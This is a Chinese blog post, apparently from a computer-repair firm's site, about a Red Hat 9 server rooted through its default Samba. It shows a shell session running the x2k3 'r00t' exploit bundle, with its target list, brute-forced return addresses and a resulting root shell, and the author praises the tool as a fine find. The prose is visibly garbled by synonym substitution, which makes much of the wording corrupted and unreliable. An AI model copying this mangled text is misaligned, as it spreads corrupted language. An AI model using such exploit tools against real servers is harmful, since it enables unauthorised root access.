设为主页 | 加入收藏 | 繁體中文

默认Samba版本在RedHat 9上的溢出获取root

  从近日对被黑服务器的宁静分析来看,我找到该用户提拔权限的东西。他是利用了Samba的宁静毛病提拔为了ROOT。 
  这几天服务器因为要放到公网测试,此时又安装了Samba服务器。结果第二天就发现了服务器被黑 
  Samba是在Redhat Linux 9上默认的版本。使用了该黑客的壮大的exploit东西提拔为了root。 
  提拔为root,只需要短短的3秒钟 
  本身汗一个 
  从服务器的tmp查找到一个x2k3的目录 
  [bob@learnin9 tmp]$ cd x2k3/ 
  [bob@learnin9 x2k3]$ ls 
  bind ftp gkr identd r00t samba 
  [bob@learnin9 x2k3]$  
  bind ftp gkr identd samba均为目录,r00t为一个步伐,让我们来看看r00t步伐的实行情况 
  [bob@learnin9 x2k3]$ ./r00t  
  .--------------------------------.  
  | x2k3 /  
  | Written by Natok /  
  +------------------------+----. 
  | Targets: [1] Samba | <= 2.2.8  
  | [2] Bind | 8.3.2 / 8.3.3 / 9.2.1  
  | [3] gkrellmd | <2.1.12  
  | [4] wu_ftpd | <=2.6.1  
  | [5] identd | 1.2  
  +------------------------+----. 
  | http://www.natok.de / 
  |____________________________/  
  ./r00t  
  [bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1 
  [*] Range to scan : 127.0.0.0 
  [*] Socket Connecting to port : 139 
  [*] Press control+c for skipping !  
  Port 139 IP 127.0.0.0 -> Connection refused! 
  Port 139 IP 127.0.0.1 -> Connection ok! 
  [+] Let’s sploit ;-) 
  samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) 
  -------------------------------------------------------------- 
  + Verbose mode. 
  + Bruteforce mode. (Linux) 
  + Host is running samba. 
  + Using ret: [0xbffffed4] 
  + Using ret: [0xbffffda8] 
  + Using ret: [0xbffffc7c] 
  + Using ret: [0xbffffb50] 
  + Using ret: [0xbffffa24] 
  + Using ret: [0xbffff8f8] 
  + Using ret: [0xbffff7cc] 
  + Using ret: [0xbffff6a0] 
  + Using ret: [0xbffff574] 
  + Using ret: [0xbffff448] 
  + Using ret: [0xbffff31c] 
  + Using ret: [0xbffff1f0] 
  + Using ret: [0xbffff0c4] 
  + Using ret: [0xbfffef98] 
  + Using ret: [0xbfffee6c] 
  + Using ret: [0xbfffed40] 
  + Using ret: [0xbfffec14] 
  + Using ret: [0xbfffeae8] 
  + Using ret: [0xbfffe9bc] 
  + Using ret: [0xbfffe890] 
  + Using ret: [0xbfffe764] 
  + Using ret: [0xbfffe638] 
  + Using ret: [0xbfffe50c] 
  + Using ret: [0xbfffe3e0] 
  + Using ret: [0xbfffe2b4] 
  + Using ret: [0xbfffe188] 
  + Worked! 
  -------------------------------------------------------------- 
  *** JE MOET JE MUIL HOUWE 
  Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux 
  uid=0(root) gid=0(root) groups=99(nobody) 
  id 
  uid=0(root) gid=0(root) groups=99(nobody) 
  看到了吧。就这么方便的被攫取为root了。 
  我这只是localhost方式,实在长途也是一样的直接获取为root了。 
  请各位好悦目看本身的Redhat 9吧。rpm -qa |grep ***** 是不是汗已经出来了? 
  还有bind gkrellmd wu_ftpd identd这些溢出步伐。我不知道这些步伐是否就是属于黑客界一些没有颁布出来的溢出步伐。呵呵! 
  我的服务器因为没有启动Bind、gkrellmd、wu_ftpd 、identd,只启动了默认安装的samba,并且还是在公网上,所以谁人黑客就中奖入侵到我的服务器了。可喜可贺,我也是终于找到了这么好的东西。 
  本身欢喜一下。去看了一下http://www.natok.de/ 居然发现是中文的网站,真相里面是谁?很猎奇......... 
  可以说,r00t步伐是Natok写的,但是exploit步伐不是他写的,他只是将其它的溢出步伐分门别类的。做了个友爱的界面,不外能搜集到还是很强的。
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: